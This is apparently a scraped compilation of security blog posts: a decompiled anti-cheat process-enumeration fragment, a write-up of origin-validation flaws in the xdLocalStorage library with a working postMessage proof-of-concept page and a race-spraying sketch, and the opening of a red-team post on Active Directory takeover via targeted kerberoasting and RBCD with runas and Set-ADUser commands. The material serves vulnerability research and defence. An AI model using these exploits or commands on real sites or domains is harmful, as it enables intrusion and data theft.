snapshot_handle = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0x00 ); if ( snapshot_handle != INVALID_HANDLE_VALUE ) { process_entry.dwSize = 0x130; if ( Process32First(snapshot_handle, &process_entry) ) { report_buffer = (std::uint8_t*)malloc(0x5000); report_buffer[0] = 0; report_buffer[1] = 0xB; buffer_index = 2; // ITERATE PROCESSES do { target_process_handle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, false, process_entry.th32ProcessID); // QUERY PROCESS IAMGE NAME name_length = 0x100; query_result = QueryFullProcessImageNameW(target_process_handle, 0, &name_buffer, &name_length); name_length = WideCharToMultiByte( CP_UTF8, 0x00, &name_buffer, name_length, &report_buffer[buffer_index + 5], 0xFF, nullptr, nullptr); valid_query = target_process_handle && query_result && name_length; // Query file size if ( valid_query ) { if ( GetFileAttributesExW(&name_buffer, GetFileExInfoStandard, &file_attributes) ) file_size = file_attributes.nFileSizeLow; else file_size = 0; } else { // TRY QUERY AGAIN WITHOUT HANDLE process_id_information.process_id = (void *)process_entry.th32ProcessID; process_id_information.image_name.Length = '\0'; process_id_information.image_name.MaximumLength = '\x02\0'; process_id_information.image_name.Buffer = name_buffer; if ( NtQuerySystemInformation(SystemProcessIdInformation, &process_id_information, 24, 1) < 0 ) { name_length = 0; } else { name_address = &report_buffer[buffer_index + 5]; name_length = WideCharToMultiByte( CP_UTF8, 0, (__int64 *)process_id_information.image_name.Buffer, process_id_information.image_name.Length / 2, name_address, 0xFF, nullptr, nullptr); } file_size = 0; } // IF MANUAL QUERY WORKED if ( name_length ) { *(_DWORD *)&report_buffer[buffer_index] = process_entry.th32ProcessID; report_buffer[buffer_index + 4] = name_length; *(_DWORD *)&report_buffer[buffer_index + 5 + name_length] = file_size; buffer_index += name_length + 9; } if ( target_process_handle ) CloseHandle(target_process_handle); // CACHE LSASS HANDLE FOR LATER !! if ( *(_DWORD *)process_entry.szExeFile == 'sasl' ) lsass_handle = OpenProcess(0x410, 0, process_entry.th32ProcessID); } while ( Process32Next(snapshot_handle, &process_entry) && buffer_index < 0x4EFB ); // CLEANUP CloseHandle((__int64)snapshot_handle); battleye::send(report_buffer, buffer_index, 0); free(report_buffer); } } Sursa: https://secret.club/2020/03/31/battleye-developer-tracking.html -
Exploiting xdLocalStorage (localStorage and postMessage)

Published by GrimHacker on 2 April 2020
Last updated on 7 April 2020

Some time ago I came across a site that was using xdLocalStorage after I had been looking into the security of HTML5 postMessage. I found that the library had several common security flaws around lack of origin validation, then noticed that there was already an open issue in the project for this problem, added it to my list of things to blog about, and promptly forgot about it. This week I have found the time to actually write this post, which I hope will prove useful not only for those using xdLocalStorage, but more generally for those attempting to find (or avoid introducing) vulnerabilities when Web Messaging is in use.

Contents

- Background
- What is xdLocalStorage?
- Origin
- Same Origin
- HTML5
- Web Storage
- DNS Spoofing Attacks
- Cross Directory Attacks
- A note to testers
- Web Messaging (AKA cross-document messaging AKA postMessage)
- Receiving a message
- Sending a message
- A note to testers
- The Vulnerability in xdLocalStorage
- Normal Operation
- Walk Through
- Visual Example
- The Vulnerabilities
- Missing origin validation when receiving messages
- Magic iframe – CVE-2015-9544
- Client – CVE-2015-9545
- Wildcard targetOrigin when sending messages
- Magic iframe – CVE-2020-11610
- Client – CVE-2020-11611
- How Wide Spread is the Issue in xdLocalStorage?
- Defence
- xdLocalStorage
- Web Messaging
- Web Storage

Background

What is xdLocalStorage?

"xdLocalStorage is a lightweight js library which implements LocalStorage interface and support cross domain storage by using iframe post message communication." [sic]
https://github.com/ofirdagan/cross-domain-local-storage/blob/master/README.md

This library aims to solve the following problem:

"As for now, standard HTML5 Web Storage (a.k.a Local Storage) doesn't now allow cross domain data sharing. This may be a big problem in an organization which have a lot of sub domains and wants to share client data between them." [sic]
https://github.com/ofirdagan/cross-domain-local-storage/blob/master/README.md

Origin

"Origins are the fundamental currency of the Web's security model. Two actors in the Web platform that share an origin are assumed to trust each other and to have the same authority. Actors with differing origins are considered potentially hostile versus each other, and are isolated from each other to varying degrees. For example, if Example Bank's Web site, hosted at bank.example.com, tries to examine the DOM of Example Charity's Web site, hosted at charity.example.org, a SecurityError DOMException will be raised."
https://html.spec.whatwg.org/multipage/origin.html

An origin may be an "opaque origin" or a "tuple origin". The former is serialised to "null" and can only meaningfully be tested for equality. A unique opaque origin is assigned to an img, audio, or video element when the data is fetched cross-origin. An opaque origin is also used for sandboxed documents, data URLs, and potentially in other circumstances. The latter is more commonly encountered and consists of:

- Scheme (e.g. "http", "https", "ftp", "ws", etc)
- Host (e.g. "www.example.com", "203.0.113.1", "2001:db8::1", "localhost")
- Port (e.g. 80, 443, or 1234)
- Domain (e.g. "www.example.com") [defaults to null]

Note: "Domain" can usually be ignored to aid understanding, but is included within the specification.
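For example, the components of a tuple origin can be inspected in the browser console with the standard URL API:

var u = new URL('https://www.example.com:8443/some/path?q=1');
console.log(u.protocol); // "https:" -> scheme
console.log(u.hostname); // "www.example.com" -> host
console.log(u.port);     // "8443" -> port
console.log(u.origin);   // "https://www.example.com:8443" (the serialised tuple origin)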
Same Origin

Two origins, A and B, are said to be same origin if:
A and B are the same opaque origin, or
A and B are both tuple origins and their schemes, hosts, and ports are identical

The following table shows several examples of origins for A and B and indicates if they are the same origin or not:

A                          B                          Same origin?
https://example.com        https://example.com        YES
http://example.com         https://example.com        NO
http://example.com         http://example.com:80      YES
https://example.com        https://example.com:8443   NO
https://example.com        https://www.example.com    NO
http://example.com:8080    http://example.com:8081    NO

HTML5

The first HTML5 draft was published in 2008 (and the specification has since been superseded by the "HTML Living Standard"); it introduced a range of new features including "Web Storage" and "Web Messaging".

Web Storage

Web storage allows applications to store data locally within the user's browser as strings in key/value pairs; significantly more data can be stored than in cookies. There are two types: local storage (localStorage) and session storage (sessionStorage). The first stores the data with no expiration, whereas the second only stores it for that one session (closing the browser tab loses the data).

There are several security considerations when utilising web storage and, as might be expected, these are around access to the data. Access to web storage is restricted to the same origin.

DNS Spoofing Attacks

If an attacker successfully performs a DNS spoofing attack, the user's browser will connect to the attacker's web server and treat all responses and content as if they came from the legitimate domain (which has been spoofed). This means that the attacker will have access to the contents of web storage and can read and manipulate it, as the origin will match. In order to prevent this, it is critical that all applications are served over a secure HTTPS connection using valid TLS certificates and HSTS, to prevent a connection being established to a malicious server.

Cross Directory Attacks

Applications that are deployed to different paths within a domain usually have the same origin (i.e. same scheme, domain/host, and port) as each other. This means that JavaScript in one application can manipulate the contents of other applications within the same origin, which is a common concern for Cross Site Scripting vulnerabilities. However, what may be overlooked is that sites with the same origin also share the same web storage objects, potentially exposing sensitive data set by one application to an attacker gaining access to another. It is therefore recommended that applications deployed in this manner avoid utilising web storage.

A note to testers

Web storage is read and manipulated via JavaScript functions in the user's browser, therefore you will not see much evidence of its use in your intercepting proxy (unless you closely review all JavaScript loaded by the application). You can utilise the developer tools in the browser to view the contents of local storage and session storage, or use the developer console to execute JavaScript and access the data.

For further information about web storage refer to the specification. For further information about using web storage safely refer to the OWASP HTML5 Security Cheat Sheet.

Web Messaging (AKA cross-document messaging AKA postMessage)

For security and privacy reasons web browsers prevent documents in different origins from affecting each other.
This is a critical security feature to prevent malicious sites from reading data from other origins the user may have accessed with the same browser, or executing JavaScript within the context of another origin. However, sometimes an application has a legitimate need to communicate with another application within the user's browser. For example, an organisation may own several domains and need to pass information about the user between them. One technique that was used to achieve this was JSONP, which I have blogged about previously.

The HTML Standard has introduced a messaging system that allows documents to communicate with each other regardless of their source origin, in order to meet this requirement without enabling Cross Site Scripting attacks. Document "A" can create an iframe (or open a window) that contains document "B". Document "A" can then call the postMessage() method on the Window object of document "B" to trigger a message event and pass information from "A" to "B". Document "B" can also use the postMessage() method on the window.parent or window.opener object to send a message to the document that opened it (in this example document "A").

Messages can be structured objects, e.g. nested objects and arrays, can contain JavaScript values (String, Number, Date objects, etc), and can contain certain data objects such as File, Blob, FileList, and ArrayBuffer objects. I have most commonly seen messages consisting of strings containing JSON, i.e. the sender uses JSON.stringify(data) and the receiver uses data = JSON.parse(event.data). Note that an HTML postMessage is completely different from an HTTP POST message!

Note: Cross-Origin Resource Sharing (CORS) can also be used to allow a web application running at one origin to access selected resources from a different origin; however, that is not the focus of this post. Refer to the article from Mozilla for further information about CORS.

Receiving a message

In order to receive messages an event handler must be registered for incoming events. For example, the addEventListener() method (often on the window) might be used to specify a function which should be called when events of type 'message' are fired. It is the developer's responsibility to check the origin attribute of any messages received to ensure that they only accept messages from origins they expect.

It is not uncommon to encounter message handling functions that are not performing any origin validation at all. However, even when origin validation is attempted it is often insufficiently robust. For example (assuming the developer intended to allow messages from https://www.example.com):

Regular expressions which do not escape the wildcard . character in domain names. e.g. https://wwwXexample.com is a valid domain name that could be registered by an attacker and would pass the following:

var regex = /https*:\/\/www.example.com$/i;
if (regex.test(event.origin)) { /* accepted */ }

Regular expressions which do not check that the string ends, by using the $ character at the end of the expression. e.g. https://www.example.com.grimhacker.com is a valid domain that could be under the attacker's control and pass the following:

var regex = /https*:\/\/www\.example\.com/i;
if (regex.test(event.origin)) { /* accepted */ }

Using indexOf to verify the origin contains the expected domain name, without accounting for the entire origin, e.g.
https://www.example.com.grimhacker.com would pass the following check:

if (event.origin.indexOf("https://www.example.com") > -1) { /* accepted */ }

Even when robust origin validation is performed, the application must still perform input validation on the data received to ensure it is in the expected format before utilising it. The application must treat the message as data rather than evaluating it as code (e.g. via eval()), and avoid inserting it into the DOM (e.g. via innerHTML). This is because any vulnerability (such as Cross Site Scripting) in an allowed domain may give an attacker the opportunity to send malicious messages from the trusted origin, which may compromise the receiving application. The impact of a malicious message being processed depends on the vulnerable application's processing of the data sent; however, DOM Based Cross Site Scripting is common.

Sending a message

When sending a message using the postMessage() method of a window, the developer has the option of specifying the targetOrigin of the message either as a parameter or within the object passed in the options parameter; if the targetOrigin is not specified it defaults to /, which restricts the message to same origin targets only. It is possible to use the wildcard * to allow any origin to receive the message.

It is important to ensure that messages include a specific targetOrigin, particularly when the message contains sensitive information. It may be tempting for developers to use the wildcard if they have created the window object, since it is easy to assume that the document within the window must be the one they intend to communicate with; however, if the location of that window has changed since it was created, the message will be sent to the new location, which may not be an origin which was ever intended. Likewise, a developer may be tempted to use the wildcard when sending a message to window.parent, as they believe only legitimate domains can/will be the parent frame/window. This is often not the case, and a malicious domain can open a window to the vulnerable application and wait to receive sensitive information via a message.

A note to testers

Web messages are entirely within the user's browser, therefore you will not see any evidence of them within your intercepting proxy (unless you closely review all JavaScript loaded by the application). You can check for registered message handlers in the "Global Listeners" section of the debugger pane in the Sources tab of the Chrome developer tools.

You can use the monitorEvents() console command in the Chrome developer tools to print messages to the console, e.g. to monitor message events sent from or received by the window: monitorEvents(window, "message"). Note that you are likely to miss messages that are sent as soon as the page loads using this method, as you will not have had the opportunity to start monitoring. Additionally, although this will capture messages sent and received by nested iframes in the same window, it will not capture messages sent to another window.

The most robust method I know of for capturing postMessages is the PMHook tool from AppCheck; usage of this tool is described in their Hunting HTML5 postMessage Vulnerabilities paper. Once you have captured the message, are able to reproduce it, and have found the handler function, you will want to use breakpoints in the handler function in order to step through the code and identify issues in the handling of messages.
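Before moving on to the reference links, here is a minimal sketch pulling together the receive- and send-side advice from the two sections above. All origins and element ids are hypothetical.

// Receive side: exact origin comparison defeats the regex/indexOf bypasses
// shown above (wwwXexample.com, www.example.com.grimhacker.com, ...).
var TRUSTED_ORIGIN = 'https://www.example.com';

window.addEventListener('message', function (event) {
  if (event.origin !== TRUSTED_ORIGIN) {
    return; // unexpected origin - ignore
  }
  var data;
  try {
    data = JSON.parse(event.data);
  } catch (err) {
    return; // not a message we understand
  }
  // Validate the shape of `data` here, treat it strictly as data,
  // and never pass it to eval() or insert it into the DOM unescaped.
}, false);

// Send side: pin the targetOrigin instead of '*', so the browser drops the
// message if the frame has been navigated to a different origin.
var frame = document.getElementById('storageFrame'); // hypothetical iframe
frame.contentWindow.postMessage(JSON.stringify({hello: 'world'}), TRUSTED_ORIGIN);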
The following resource from Google provides an introduction to using the developer tools in Chrome: https://developers.google.com/web/tools/chrome-devtools/javascript

For further information about web messaging refer to the specification. For further information about safely using web messaging refer to the OWASP HTML5 Security Cheat Sheet. For more in-depth information regarding finding and exploiting vulnerabilities in web messages I recommend the paper Hunting HTML5 postMessage Vulnerabilities from Sec-1/AppCheck.

The Vulnerability in xdLocalStorage

Normal Operation Walk Through

Normal usage of the xdLocalStorage library (according to the README) is to create an HTML document which imports xdLocalStoragePostMessageApi.min.js on the domain that will store the data (this is the "magical iframe"), and to import xdLocalStorage.min.js on the "client page" which needs to manipulate the data. Note: Angular applications can import ng-xdLocalStorage.min.js and inject the xdLocalStorage module where required to use the API.

The client

The interface is initialised on the client page with the URL of the "magical iframe", after which the setItem(), getItem(), removeItem(), key(), and clear() API functions can be called to interact with the local storage of the domain hosting the "magical iframe".

When the library initialises on the client page it appends an iframe to the body of the page which loads the "magical iframe" document. It also registers an event handler using addEventListener or attachEvent (depending on browser capabilities). The init function is included below (line 56 of xdLocalStorage.js):

function init(customOptions) {
  options = XdUtils.extend(customOptions, options);
  var temp = document.createElement('div');
  if (window.addEventListener) {
    window.addEventListener('message', receiveMessage, false);
  } else {
    window.attachEvent('onmessage', receiveMessage);
  }
  temp.innerHTML = '<iframe id="' + options.iframeId + '" src="' + options.iframeUrl + '" style="display: none;"></iframe>';
  document.body.appendChild(temp);
  iframe = document.getElementById(options.iframeId);
}

When the client page calls one of the API functions it must supply any required parameters (e.g. getItem() requires that the key name is specified) and a callback function. The API function calls the buildMessage() function, passing an appropriate action string for itself along with the parameters and callback function. The getItem() API function is included below as an example (line 125 of xdLocalStorage.js):

getItem: function (key, callback) {
  if (!isApiReady()) {
    return;
  }
  buildMessage('get', key, null, callback);
},

The buildMessage() function increments a requestId and stores the callback associated with this requestId. It then creates a data object containing a namespace, the requestId, the action to be performed (e.g. getItem() causes a "get" action), the key name, and the value. This data is converted to a string and sent as a postMessage to the "magical iframe".
The buildMessage() function is included below (line 43 in xdLocalStorage.js):

function buildMessage(action, key, value, callback) {
  requestId++;
  requests[requestId] = callback;
  var data = {
    namespace: MESSAGE_NAMESPACE,
    id: requestId,
    action: action,
    key: key,
    value: value
  };
  iframe.contentWindow.postMessage(JSON.stringify(data), '*');
}

The "magical iframe"

When the document is loaded a handler function is attached to the window (using either addEventListener() or attachEvent() depending on browser support) as shown below (line 90 in xdLocalStoragePostMessageApi.js):

if (window.addEventListener) {
  window.addEventListener('message', receiveMessage, false);
} else {
  window.attachEvent('onmessage', receiveMessage);
}

It then sends a message to the parent window to indicate it is ready (line 96 in xdLocalStoragePostMessageApi.js):

function sendOnLoad() {
  var data = {
    namespace: MESSAGE_NAMESPACE,
    id: 'iframe-ready'
  };
  parent.postMessage(JSON.stringify(data), '*');
}
//on creation
sendOnLoad();

When a message is received, the browser will call the function that has been registered and pass it the event object. The receiveMessage() function will attempt to parse the event.data attribute as JSON and, if successful, check whether the namespace attribute of the data object matches the configured MESSAGE_NAMESPACE. It will then call the required function based on the value of the data.action attribute; for example "get" results in a call to getData() which is passed the data.key attribute. The receiveMessage() function is included below (line 63 of xdLocalStoragePostMessageApi.js):

function receiveMessage(event) {
  var data;
  try {
    data = JSON.parse(event.data);
  } catch (err) {
    //not our message, can ignore
  }
  if (data && data.namespace === MESSAGE_NAMESPACE) {
    if (data.action === 'set') {
      setData(data.id, data.key, data.value);
    } else if (data.action === 'get') {
      getData(data.id, data.key);
    } else if (data.action === 'remove') {
      removeData(data.id, data.key);
    } else if (data.action === 'key') {
      getKey(data.id, data.key);
    } else if (data.action === 'size') {
      getSize(data.id);
    } else if (data.action === 'length') {
      getLength(data.id);
    } else if (data.action === 'clear') {
      clear(data.id);
    }
  }
}

The selected function will then directly interact with the localStorage object to carry out the requested action and call the postData() function to send the data back to the parent window. To illustrate this, the getData() and postData() functions are shown below (respectively lines 20 and 14 in xdLocalStoragePostMessageApi.js):

function getData(id, key) {
  var value = localStorage.getItem(key);
  var data = {
    key: key,
    value: value
  };
  postData(id, data);
}

function postData(id, data) {
  var mergedData = XdUtils.extend(data, defaultData);
  mergedData.id = id;
  parent.postMessage(JSON.stringify(mergedData), '*');
}

The client

When a message is received, the browser will call the function that has been registered and pass it the event object. The receiveMessage() function will attempt to parse the event.data attribute as JSON and, if successful, check whether the namespace attribute of the data object matches the configured MESSAGE_NAMESPACE. If the data.id attribute is "iframe-ready" then the initCallback() function is executed (if one has been configured), otherwise the data object is passed to the applyCallback() function.
This is shown below (line 26 of xdLocalStorage.js):

function receiveMessage(event) {
  var data;
  try {
    data = JSON.parse(event.data);
  } catch (err) {
    //not our message, can ignore
  }
  if (data && data.namespace === MESSAGE_NAMESPACE) {
    if (data.id === 'iframe-ready') {
      iframeReady = true;
      options.initCallback();
    } else {
      applyCallback(data);
    }
  }
}

The applyCallback() function simply uses the data.id attribute to find the callback function that was stored for the matching requestId and executes it, passing it the data. This is shown below (line 19 of xdLocalStorage.js):

function applyCallback(data) {
  if (requests[data.id]) {
    requests[data.id](data);
    delete requests[data.id];
  }
}

Visual Example

The sequence diagram shows (at a very high level) the interaction between the client (SiteA) and the "magical iframe" (SiteB) when the getItem function is called.

The Vulnerabilities

Missing origin validation when receiving messages

Magic iframe – CVE-2015-9544

The receiveMessage() function in xdLocalStoragePostMessageApi.js does not implement any validation of the origin. The only requirements for the message to be successfully processed are that the message is a string that can be parsed as JSON, the namespace attribute of the message matches the configured MESSAGE_NAMESPACE (default is "cross-domain-local-message"), and the action attribute is one of the following strings: "set", "get", "remove", "key", "size", "length", or "clear". Therefore a malicious domain can send a message that meets these requirements and manipulate the local storage of the domain.

In order to exploit this issue an attacker would need to entice a user to load a malicious site, which then interacts with the legitimate site hosting the "magical iframe". The following proof of concept allows the user to set a value for "pockey" in the local storage of the domain hosting the vulnerable "magic iframe". However it would also be possible to retrieve all information from local storage and send this to the attacker, by exploiting this issue in combination with the use of a wildcard targetOrigin (discussed below).
<html>
<!-- POC exploit for xdLocalStorage.js by GrimHacker
https://grimhacker.com/exploiting-xdlocalstorage-(localstorage-and-postmessage) -->
<body>
<script>
var MESSAGE_NAMESPACE = "cross-domain-local-message";
var targetSite = "http://siteb.grimhacker.com:8000/cross-domain-local-storage.html"; // magical iframe
var iframeId = "vulnerablesite";
var a = document.createElement("a");
a.href = targetSite;
var targetOrigin = a.origin;

function receiveMessage(event) {
  var data;
  data = JSON.parse(event.data);
  var message = document.getElementById("message");
  message.textContent = "My Origin: " + window.origin +
    "\r\nevent.origin: " + event.origin +
    "\r\nevent.data: " + event.data;
}
window.addEventListener('message', receiveMessage, false);

var temp = document.createElement('div');
temp.innerHTML = '<iframe id="' + iframeId + '" src="' + targetSite + '" style="display: none;"></iframe>';
document.body.appendChild(temp);
iframe = document.getElementById(iframeId);

function setValue() {
  var valueInput = document.getElementById("valueInput");
  var data = {
    namespace: MESSAGE_NAMESPACE,
    id: 1,
    action: "set",
    key: "pockey",
    value: valueInput.value
  };
  iframe.contentWindow.postMessage(JSON.stringify(data), targetOrigin);
}
</script>
<div class=label>Enter a value to assign to "pockey" on the vulnerable target:</div>
<input id=valueInput>
<button onclick=setValue()>Set pockey</button>
<div><p>The latest postmessage received will be shown below:</p></div>
<div id="message" style="white-space: pre;"></div>
</body>
</html>

The screenshots below demonstrate this:
SiteA loads an iframe for cross-domain-local-storage.html on SiteB and receives an "iframe-ready" postMessage.
SiteA sends a postMessage to the SiteB iframe to set the key "pockey" with the specified value "pocvalue" in the SiteB local storage.
SiteB sends a postMessage to SiteA to indicate success.
Checking the local storage for SiteB shows the key and value have been set.

Depending on how the local storage data is used by the legitimate client application, altering the data as shown above may impact the security of the client application.

Client – CVE-2015-9545

The receiveMessage() function in xdLocalStorage.js does not implement any validation of the origin. The only requirements for the message to be successfully processed are that the message is a string that can be parsed as JSON, the data.namespace attribute of the message matches the configured MESSAGE_NAMESPACE (default is "cross-domain-local-message"), and the data.id attribute of the message matches a requestId that is currently pending. Therefore a malicious domain can send a message that meets these requirements and cause their malicious data to be processed by the callback configured by the vulnerable application. Note that requestId is a number that increments with each legitimate request the vulnerable application sends to the "magic iframe", therefore exploitation would involve winning a race condition.

In order to exploit this issue an attacker would need to entice a user to load a malicious site, which then interacts with the legitimate client site. Exact exploitation of this issue would depend on how the vulnerable application uses the data it intended to retrieve from local storage; analysis of the functionality would be required in order to identify a valid attack vector.
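As a purely hypothetical illustration of the race described above, an attacker page could open the vulnerable client and spray plausible requestId values, hoping one lands on a pending callback. The victim URL, key name, and id range below are invented for the sketch.

// Hypothetical sketch of racing CVE-2015-9545: spray message ids at the
// vulnerable client window, hoping one matches a pending requestId.
var victim = window.open('https://client.example.com/app.html'); // assumed victim URL

setInterval(function () {
  for (var id = 1; id <= 50; id++) { // invented id range
    victim.postMessage(JSON.stringify({
      namespace: 'cross-domain-local-message', // the library default MESSAGE_NAMESPACE
      id: id,
      key: 'profile',          // hypothetical key the client expects
      value: 'attacker-value'  // processed by the stored callback on a hit
    }), '*');
  }
}, 250);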
Wildcard targetOrigin when sending messages

Magic iframe – CVE-2020-11610

The postData() function in xdLocalStoragePostMessageApi.js specifies the wildcard (*) as the targetOrigin when calling the postMessage() function on the parent object. Therefore any domain can load the application hosting the "magical iframe" and receive the messages that the "magical iframe" sends.

In order to exploit this issue an attacker would need to entice a user to load a malicious site, which then interacts with the legitimate site hosting the "magical iframe" and receives any messages it sends as a result of the interaction. Note that this issue can be combined with the lack of origin validation to recover all information from local storage: an attacker could first retrieve the length of local storage and then iterate through each key index, and the "magical iframe" would send each key and value to the parent, which in this case would be the attacker's domain.

Client – CVE-2020-11611

The buildMessage() function in xdLocalStorage.js specifies the wildcard (*) as the targetOrigin when calling the postMessage() function on the iframe object. Therefore any domain that is currently loaded within the iframe can receive the messages that the client sends.

In order to exploit this issue an attacker would need to redirect the "magical iframe" loaded on the vulnerable application within the user's browser to a domain they control. This is non-trivial, but there may be some scenarios where this can occur. If an attacker were able to successfully exploit this issue they would have access to any information that the client sends to the iframe, and would also be able to send messages back with a valid requestId which would then be processed by the client; this may further impact the security of the client application.

How Wide Spread is the Issue in xdLocalStorage?

At the time of writing all versions of xdLocalStorage (previously called cross-domain-local-storage) are vulnerable, i.e. release 1.0.1 (released 2014-04-17) to 2.0.5 (released 2017-04-14). According to the project README the recommended method of installing is via bower or npm. npmjs.com shows that the library has around 350 weekly downloads (March 2020).

https://npmjs.com/package/xdlocalstorage (2020-03-20)

Defence

xdLocalStorage

This issue has been known since at least August 2015, when Hengjie opened an issue on the GitHub repository to notify the project owner (https://github.com/ofirdagan/cross-domain-local-storage/issues/17). However, the pull request which included functionality to whitelist origins has not been accepted or worked on since July 2016 (https://github.com/ofirdagan/cross-domain-local-storage/pull/19). The last commit on the project (at the time of writing) was in August 2018. Therefore a fix from the project maintainer may not be forthcoming. Consider replacing this library with a maintained alternative which includes robust origin validation, or implement validation within the existing library (a sketch of such a patch is shown after the Web Messaging notes below).

Web Messaging

Refer to the OWASP HTML5 Security Cheat Sheet.
When sending a message explicitly state the targetOrigin (do not use the wildcard *).
When receiving a message carefully validate the origin of any message to ensure it is from an expected source.
When receiving a message carefully validate the data to ensure it is in the expected format and safe to use in the context it is in (e.g. HTML markup within the data may not be safe to embed directly into the page as this would introduce DOM Based Cross Site Scripting).
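For illustration, a minimal origin allowlist for the magic iframe's receiveMessage() might look like the sketch below. The allowed origins are placeholders to be configured per deployment; this is an assumed patch, not the library's actual fix.

// Sketch: origin allowlist for the magic iframe (xdLocalStoragePostMessageApi.js).
// The origins below are placeholders - configure them per deployment.
var ALLOWED_ORIGINS = ['https://sitea.example.com', 'https://siteb.example.com'];

function receiveMessage(event) {
  if (ALLOWED_ORIGINS.indexOf(event.origin) === -1) {
    return; // drop messages from unexpected origins before acting on them
  }
  var data;
  try {
    data = JSON.parse(event.data);
  } catch (err) {
    return; // not our message, can ignore
  }
  // ... the existing namespace check and action dispatch remain unchanged ...
}

// Replies should also echo the validated origin rather than '*', e.g.:
// parent.postMessage(JSON.stringify(mergedData), event.origin);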
Web Storage

Refer to the OWASP HTML5 Security Cheat Sheet.

Sursa: https://grimhacker.com/2020/04/02/exploiting-xdlocalstorage-localstorage-and-postmessage/
-
Chaining multiple techniques and tools for domain takeover using RBCD
Reading time ~26 min
Posted by Sergio Lazaro on 09 March 2020
Categories: Active directory, Internals, Bloodhound, Dacls, Mimikatz, Powerview, Rubeus

Intro

In this blog post I want to show a simulation of a real-world Resource Based Constrained Delegation attack scenario that could be used to escalate privileges on an Active Directory domain. I recently faced a network that had had several assessments done before. Luckily for me, before this engagement I had used some of my research time to understand more advanced Active Directory attack concepts.

This blog post isn't new and I used lots of existing tools to perform the attack. Worse, there are easier ways to do it as well. But this assessment required different approaches, and I wanted to show defenders and attackers that if you understand the concepts you can take more than one path.

The core of the attack is about abusing resource-based constrained delegation (RBCD) in Active Directory (AD). Last year, Elad Shamir wrote a great blog post explaining how the attack works and how it can result in a Discretionary Access Control List (DACL)-based computer object takeover primitive. In line with this research, Andrew Robbins and Will Schroeder presented DACL-based attacks at Black Hat back in 2017 that you can read here.

To test the attacks I created a typical client network using an AWS Domain Controller (DC) with some supporting infrastructure. This also served as a nice addition to our Infrastructure Training at SensePost by expanding the modern AD attack section and practicals. We'll be giving this at Black Hat USA. The attack is demonstrated against my practice environment.

Starting Point

After some time on the network, I was able to collect local and domain credentials that I used in further lateral movement. However, I wasn't lucky enough to compromise credentials for users that were part of the Domain Admins group. Using BloodHound, I realised that I had compromised two privileged groups with the credentials I gathered: RMTAdmins and MGMTAdmins. The users from those groups that will be used throughout the blog post are:

RONALD.MGMT (cleartext credentials) (member of MGMTAdmins)
SVCRDM (NTLM hash) (member of RMTADMINS)

One – The user RONALD.MGMT was configured with interesting write privileges on a user object. If the user was compromised, the privileges obtained would create the opportunity to start a chain of attacks due to DACL misconfigurations on multiple users. To show you a visualisation, BloodHound looked as follows:

Figure 1 – DACL attack path from RONALD.MGMT to SVCSYNC user.

According to Figure 1, the SVCSYNC user was marked as a high value target. This is important since this user was able to perform a DCSync (due to the GetChanges & GetChangesAll privileges) on the main domain object:

Figure 2 – SVCSYNC had sufficient privileges on the domain object to perform a DCSync.

Two – The second user, SVCRDM, was part of a privileged group able to change the owner of a DC computer due to the WriteOwner privilege. The privileges the group had were applied to all the members, effectively granting SVCRDM the WriteOwner privilege. BloodHound showed this relationship as follows:

Figure 3 – SVCRDM user, member of RMTADMINS, had WriteOwner privileges over the main DC.
With these two graphs BloodHound presented, there were two different approaches to compromise the domain:

Perform a chain of targeted kerberoasting attacks to compromise the SVCSYNC user and perform a DCSync.
Abuse the RBCD attack primitive to compromise the DC computer object.

Targeted Kerberoasting

There are two ways to compromise a user object when we have write privileges (GenericWrite/GenericAll/WriteDacl/WriteOwner) on the object: we can force a password reset, or we can rely on the targeted kerberoasting technique. For obvious reasons, forcing a password reset on these users wasn't an option. The only option to compromise the users was a chain of targeted kerberoasting attacks to finally reach the high value target SVCSYNC.

Harmj0y described the targeted kerberoasting technique in a blog post he wrote while developing BloodHound with _wald0 and @cptjesus. Basically, when we have write privileges on a user object, we can add the Service Principal Name (SPN) attribute and set it to whatever we want, then kerberoast the ticket and crack it using John/Hashcat. Later, we can remove the attribute to clean up the changes we made.

There are a lot of ways to perform this attack. Probably the easiest way is using PowerView. However, I chose to use PowerShell's ActiveDirectory module and impacket.

According to Figure 1, my first target was SUSANK on the road to SVCSYNC. Since I had the credentials of RONALD.MGMT, I could use Runas on my VM to spawn a PowerShell command line using RONALD.MGMT's credentials:

runas /netonly /user:ronald.mgmt@maemo.local powershell

Runas is really useful as it spawns a CMD using the credentials of a domain user from a machine which isn't part of the domain. The only requirement is that DNS resolves correctly. The /netonly flag is important because the provided credentials will only be used when network resources are accessed.

Figure 4 – Spawning PowerShell using Runas with RONALD.MGMT credentials.

In the new PowerShell terminal, I loaded the ActiveDirectory PowerShell module to perform the targeted kerberoast on the user I was interested in (SUSANK in this case). Below are the commands used to add a new SPN to the account:

Import-Module ActiveDirectory
Get-ADUser susank -Server MAEMODC01.maemo.local
Set-ADUser susank -ServicePrincipalNames @{Add="sensepost/targetedkerberoast"} -Server MAEMODC01.maemo.local

Figure 5 – Targeted kerberoast using the ActiveDirectory PowerShell module.

After a new SPN is added, we can use impacket's GetUserSPNs to retrieve Ticket Granting Service (TGS) tickets as usual:

Figure 6 – Impacket's GetUserSPNs was used to request the Ticket-Granting-Service (TGS) of every SPN.

In the lab there weren't any other SPNs configured, although in the real world there are likely to be more. TGS tickets can be cracked offline, as portions of the ticket are encrypted using the target user's Kerberos 5 TGS-REP etype 23 hash as the private key, making it possible to obtain the cleartext password of the target account in an offline brute force attack. In this case, I used Hashcat:

Figure 7 – The TGS obtained before was successfully cracked using Hashcat.

Once the user SUSANK was compromised, I repeated the same process with the other users in order to reach the high value target SVCSYNC. However, I had no luck when I performed the targeted kerberoasting attack and tried to crack the tickets of the PIERREQA and JUSTINC users, both necessary steps in the path. Thus, I had to stop following this attack path.
However, having the ability to add the serviceprincipalname attribute to a user was really important in order to compromise the DC later by abusing the RBCD computer object primitive. Keep this in mind, as we'll come back to SUSANK later.

Resource-based Constrained Delegation (RBCD)

I'm not going to dig into all of the details on how an RBCD attack works. Elad wrote a really good blog post called "Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory" that explains all the concepts I'm going to use. If you haven't read it, I suggest you stop here and spend some time trying to understand all the requirements and concepts he explained. It's a long blog post, so grab some coffee.

As a TL;DR, I'll list the main concepts you'll need to know to spot and abuse Elad's attack:

Owning an SPN is required. This can be obtained by setting the serviceprincipalname attribute on a user object when we have write privileges. Another approach relies on abusing a directory's MachineAccountQuota to create a computer account, which by default comes with the serviceprincipalname attribute set.
